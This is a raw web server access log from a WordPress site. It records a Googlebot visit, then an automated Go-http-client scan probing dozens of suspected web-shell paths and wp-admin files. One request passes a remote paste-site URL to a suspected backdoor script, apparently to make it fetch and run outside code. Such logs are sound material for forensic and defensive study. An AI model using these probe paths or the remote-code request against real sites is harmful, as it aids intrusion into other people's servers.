66.249.79.168 - - [19/Oct/2025:11:36:48 -0400] "GET /first-karva-chauth-in-bollywood-actress/harshdeep-kaurmankeet-singh/ HTTP/1.1" 200 122054 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.24.219.165 - - [19/Oct/2025:11:36:49 -0400] "GET //wp-admin/js/about.php HTTP/1.1" 301 - "-" "Go-http-client/1.1"
216.24.219.165 - - [19/Oct/2025:11:36:49 -0400] "GET /wp-admin/js/about.php HTTP/1.1" 404 136514 "http://wahgazab.com//wp-admin/js/about.php" "Go-http-client/1.1"
216.24.219.165 - - [19/Oct/2025:11:36:50 -0400] "GET //wp-admin/maint/moon.php HTTP/1.1" 301 - "-" "Go-http-client/1.1"
216.24.219.165 - - [19/Oct/2025:11:36:51 -0400] "GET /wp-admin/maint/moon.php HTTP/1.1" 404 136514 "http://wahgazab.com//wp-admin/maint/moon.php" "Go-http-client/1.1"
216.24.219.165 - - [19/Oct/2025:11:36:52 -0400] "GET //duck.php HTTP/1.1" 301 - "-" "Go-http-client/1.1"
216.24.219.165 - - [19/Oct/2025:11:36:53 -0400] "GET /duck.php HTTP/1.1" 404 136514 "http://wahgazab.com//duck.php" "Go-http-client/1.1"
216.24.219.165 - - [19/Oct/2025:11:36:54 -0400] "GET //wp-includes/js/plupload/index.php HTTP/1.1" 301 - "-" "Go-http-client/1.1"
216.24.219.165 - - [19/Oct/2025:11:36:55 -0400] "GET /wp-includes/js/plupload/ HTTP/1.1" 200 2278 "http://wahgazab.com//wp-includes/js/plupload/index.php" "Go-http-client/1.1"
216.24.219.165 - - [19/Oct/2025:11:36:55 -0400] "GET //wp-admin/dropdown.php HTTP/1.1" 301 - "-" "Go-http-client/1.1"
216.24.219.165 - - [19/Oct/2025:11:36:55 -0400] "GET /wp-admin/dropdown.php HTTP/1.1" 404 136514 "http://wahgazab.com//wp-admin/dropdown.php" "Go-http-client/1.1"
216.24.219.165 - - [19/Oct/2025:11:36:57 -0400] "GET //wp-includes/blocks/post-excerpt/index.php HTTP/1.1" 301 - "-" "Go-http-client/1.1"
216.24.219.165 - - [19/Oct/2025:11:36:57 -0400] "GET /wp-includes/blocks/post-excerpt/ HTTP/1.1" 200 2301 "http://wahgazab.com//wp-includes/blocks/post-excerpt/index.php" "Go-http-client/1.1"
216.24.219.165 - - [19/Oct/2025:11:36:58 -0400] "GET //mar.php HTTP/1.1" 301 - "-" "Go-http-client/1.1"
216.24.219.165 - - [19/Oct/2025:11:36:58 -0400] "GET /mar.php HTTP/1.1" 404 136514 "http://wahgazab.com//mar.php" "Go-http-client/1.1"
216.24.219.165 - - [19/Oct/2025:11:37:00 -0400] "GET //radio.php?vz=https://textbin.net/raw/bytsdwrs5a HTTP/1.1" 301 - "-" "Go-http-client/1.1"
216.24.219.165 - - [19/Oct/2025:11:37:00 -0400] "GET /radio.php?vz=https://textbin.net/raw/bytsdwrs5a HTTP/1.1" 404 136514 "http://wahgazab.com//radio.php?vz=https://textbin.net/raw/bytsdwrs5a" "Go-http-client/1.1"
216.24.219.165 - - [19/Oct/2025:11:37:01 -0400] "GET //wp-content/themes/bute/lang.php HTTP/1.1" 301 - "-" "Go-http-client/1.1"
216.24.219.165 - - [19/Oct/2025:11:37:02 -0400] "GET /wp-content/themes/bute/lang.php HTTP/1.1" 404 136514 "http://wahgazab.com//wp-content/themes/bute/lang.php" "Go-http-client/1.1"
216.24.219.165 - - [19/Oct/2025:11:37:03 -0400] "GET //wp-cron.php?ac=3 HTTP/1.1" 200 - "-" "Go-http-client/1.1"
216.24.219.165 - - [19/Oct/2025:11:37:04 -0400] "GET //wp-admin/about.php HTTP/1.1" 302 - "-" "Go-http-client/1.1"
216.24.219.165 - - [19/Oct/2025:11:37:04 -0400] "GET /wp-login.php?redirect_to=http%3A%2F%2Fwahgazab.com%2F%2Fwp-admin%2Fabout.php&reauth=1 HTTP/1.1" 200 5425 "http://wahgazab.com//wp-admin/about.php" "Go-http-client/1.1"
216.24.219.165 - - [19/Oct/2025:11:37:05 -0400] "GET //wp-content/about.php HTTP/1.1" 301 - "-" "Go-http-client/1.1"
216.24.219.165 - - [19/Oct/2025:11:37:05 -0400] "GET /wp-content/about.php HTTP/1.1" 404 136514 "http://wahgazab.com//wp-content/about.php" "Go-http-client/1.1"
